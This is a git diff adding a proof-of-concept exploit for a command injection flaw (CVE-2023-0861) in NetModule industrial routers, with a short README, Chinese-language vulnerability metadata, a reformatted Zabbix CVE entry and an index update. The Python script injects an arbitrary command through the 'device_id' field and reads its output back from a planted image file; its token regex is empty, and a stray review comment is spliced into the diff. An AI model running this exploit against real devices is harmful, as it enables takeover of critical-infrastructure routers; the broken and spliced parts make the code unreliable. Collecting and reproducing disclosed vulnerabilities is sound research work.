diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
new file mode 100644
index 0000000000000000000000000000000000000000..28a9172be49e0e579c746c455e91f12301c76a13
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
@@ -0,0 +1,31 @@
+import re
+import requests
+import argparse
+import urllib.parse
+
+
+parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC')
+parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router')
+parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication')
+parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload')
+args = parser.parse_args()
+
+url = f'{args.url}/admin/gnss.php'
+c = {'PHPSESSID':args.phpsessid}
+response = requests.get(url,cookies=c)
+csrf_token = re.search(r'', response.text).group(1)
+#print(csrf_token)
+data = {
+'toggleAlignment': 'test',
+'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2',
+'csrf-token': csrf_token,
+}
+#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2')
+url = f'{args.url}/admin/gnssAutoAlign.php'
+
+response = requests.post(url, data=data,cookies=c)
+
+if response.status_code == 200:
+ results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c)
+ #print('done!')
+ print(results.content.decode())
\ No newline at end of file
diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..9024e8db99830f29f168a4ead25b64c72f6ab55b
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/README.md
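Review bot: The `csrf_token = re.search(r'', response.text).group(1)` line has no guard for a failed match: the pattern as committed is empty (the HTML tag may have been lost on the way into the listing — confirm), so `.group(1)` raises IndexError, and an expired or wrong `--phpsessid` returns a login page for which `re.search` yields None and the script dies with an AttributeError instead of a readable message; `match = re.search(PATTERN, response.text)` followed by `if match is None: raise SystemExit('csrf-token not found; check --phpsessid')` would make the failure mode explicit. `import urllib.parse` is referenced only in a commented-out print and should be dropped, and `results.content.decode()` should use `errors='replace'` so non-UTF-8 output does not crash the script. Neither `requests` call passes `timeout=`, so an unresponsive device blocks the script indefinitely. A module docstring should also state that a run leaves `nothing.png` under `/home/www-data/admin/img/` on the device so that anyone reproducing this in a lab knows to clean it up.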
@@ -0,0 +1,9 @@
+### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers
+
+NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical
+infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security
+advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web
+management interface and allow authenticated users to execute arbitrary commands with elevated privileges.
+As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of
+reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the
+disclosed vulnerability.
diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..7495f7ac072423273729457ece85d9338b822d55
--- /dev/null
+++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-0861
+source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC
+info:
+ name: ONetModule NSRW是NetModule公司的一系列路由器软件。
+ severity: HIGH
+ description: |
+ NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。
+ scope-of-influence:
+ NSWR 4.3.0.0-4.3.0.119,4.4.0.0-4.4.0.118,4.6.0.0-4.6.0.105,4.7.0.0-4.7.0.103
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0861
+ - https://avd.aliyun.com/detail?id=AVD-2023-0861
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0861
+ cwe-id: CWE-78, CWE-77
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023
\ No newline at end of file
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
index 0eab256c4dfe862200d680cff85dda2a1537ef4e..e3f384c6c24d7dba5f7d0ef6e46f8b0a2f653a79 100644
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
+id: CVE-2022-23131
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
 tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9b6a0f883e6ec8f7d5fee2831d768801e8c67f83..703877e13d5b33f31a095feef43137d872f4fb71 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -174,6 +174,8 @@ cve:
 Froxlor:
 - CVE-2021-42325
 - CVE-2023-0315
+ NetModule:
+ - CVE-2023-0861
 cnvd:
 apache-tomcat:
 - CNVD-2020-10487